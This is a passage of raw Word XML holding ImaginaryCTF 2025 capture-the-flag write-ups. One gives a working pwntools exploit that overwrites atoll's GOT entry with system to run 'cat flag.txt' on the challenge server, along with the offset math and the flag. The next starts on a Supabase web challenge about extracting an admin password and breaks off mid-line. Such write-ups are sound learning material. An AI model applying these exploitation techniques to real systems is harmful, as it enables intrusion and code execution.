      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">val;   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>// 64-bit add, no bounds check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E727FED" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A294B7" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>Key properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3026B8" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No bounds check</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> → arbitrary 8-byte add into process memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A2C72" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atoll(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> is used to parse your inputs each time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797F5D1" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PLT/GOT</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> is writable (no RELRO or partial RELRO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE3C0D" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:lastRenderedPageBreak/>
        <w:t>The GOT entry for atoll is already resolved when we start interacting, so it holds the real libc address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12927E" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="00000000" w:rsidP="005B2A08">
      <w:r>
        <w:pict w14:anchorId="52C0F9CD">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AC876" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target addresses &amp; math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3924CA" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>Using the provided artifacts (vuln, libc.so.6, ld-linux-x86-64.so.2) we get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4555FC" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>libc offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> (exported symbols):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800A772" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>system @ 0x0000000000050d60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C24A6D6" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>atoll @ 0x0000000000043670</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25216B8F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">Compute the delta we need to </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> into the atoll@GOT entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2824B2" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>DELTA = system - atoll = 0x50d60 - 0x43670 = 0x0d6f0 = 55024 (dec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351468AD" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary static addresses (PIE off / fixed region used by the challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B008E89" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>buf = 0x4069</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6907DF" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>atoll@GOT = 0x4020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5FB148" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>Compute the index into the “add where?” pointer space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3120E4A2" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>INDEX = GOT_ATOLL - BUF = 0x4020 - 0x4069 = -0x49 = -73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EFEDA5" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> the plan is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CC820" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">Write at offset </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INDEX = -73</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16771F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DELTA = 55024</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> to *(buf + INDEX) → patches atoll@GOT into system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4D813" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:t>Next time the binary calls atoll(...), it actually calls system(...) with our input string. Send cat flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C421576" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="00000000" w:rsidP="005B2A08">
      <w:r>
        <w:pict w14:anchorId="503C17A5">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E316D" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit (Pwntools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAE941" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED34778" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="2A698CF4" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>HOST, PORT = "addition.chal.imaginaryctf.org", 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51359F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="7C82EB73" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t># Offsets computed from your uploaded libc.so.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FA10C" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>LIBC_SYSTEM = 0x0000000000050d60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32223662" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>LIBC_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>ATOLL  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve"> 0x0000000000043670</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D0C17" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:lastRenderedPageBreak/>
        <w:t>DELTA = LIBC_SYSTEM - LIBC_ATOLL   # 0xd6f0 = 55024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15BAED" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="2FB0F781" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t># PIE-relative offsets computed from your binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313EECC" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>BUF      = 0x4069</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCE745" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>GOT_ATOLL= 0x4020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50010FC4" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>INDEX = GOT_ATOLL - BUF            # -73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6B9E7" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="09D6BBBF" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>solve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED4649" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    io = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>remote(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>HOST, PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE2553" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    # 1) point at atoll@GOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAD3F1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io.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">(b"add where?", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>INDEX</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F01A8E1" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    # 2) add (system - atoll) to GOT entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8A1E5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io.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">(b"add what?", </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>DELTA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27A616" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="7F1B4FF0" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    # 3) Now atoll has become system. Next "add where?" calls </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>&lt;our string&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6A1FF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io.sendlineafter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>(b"add where?", b"cat flag.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26119E90" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    # The program will try to ask "add what?" again; just read output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCB582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print(io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>(b'\n', timeout=2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>(errors="ignore"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC02BC" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>io.recvrepeat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>(1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>(errors="ignore"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91BD38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io.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814B56F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08"/>
    <w:p w14:paraId="1D811D9F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A1C5F" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>solve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B2A08">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848D219" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2A08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0FABF" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRPr="005B2A08" w:rsidRDefault="005B2A08" w:rsidP="005B2A08">
      <w:r w:rsidRPr="005B2A08">
        <w:t>ictf{i_love_finding_offsets_4fd29170cb90}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF9A49" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRDefault="000D4C0E"/>
    <w:p w14:paraId="7828D865" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRDefault="005B2A08"/>
    <w:p w14:paraId="4936925A" w14:textId="77777777" w:rsidR="005B2A08" w:rsidRDefault="005B2A08"/>
    <w:p w14:paraId="182E1F47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lastRenderedPageBreak/>
        <w:t>ImaginaryCTF 2025 – Imaginary Notes (Web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C72AB34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Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161EC904" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>We’re given a note-taking app running on Supabase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36125574" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>http://imaginary-notes.chal.imaginaryctf.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865030D" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>The description hints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633079A" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:t>The flag is the password of the admin account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB77EC6" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:t>The database table is called users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60877E58" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">The Supabase </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anonymous key</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> is hidden somewhere in the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906DF18" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="00000000" w:rsidP="005F52EB">
      <w:r>
        <w:pict w14:anchorId="12B898D0">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A96F7E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Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26EB19" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">Opening the site shows a basic </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next.js login/signup page</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve">. Checking the page source and loaded JS chunks in DevTools → </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sources</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="005F52EB">
        <w:t>, we spot this line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215EC02" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
      <w:r w:rsidRPr="005F52EB">
        <w:t>a(5647</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>).UU)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F52EB">
        <w:t>"https://dpyxnwiuwzahkxuxrojp.supabase.co",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BDEF9" w14:textId="77777777" w:rsidR="005F52EB" w:rsidRPr="005F52EB" w:rsidRDefault="005F52EB" w:rsidP="005F52EB">
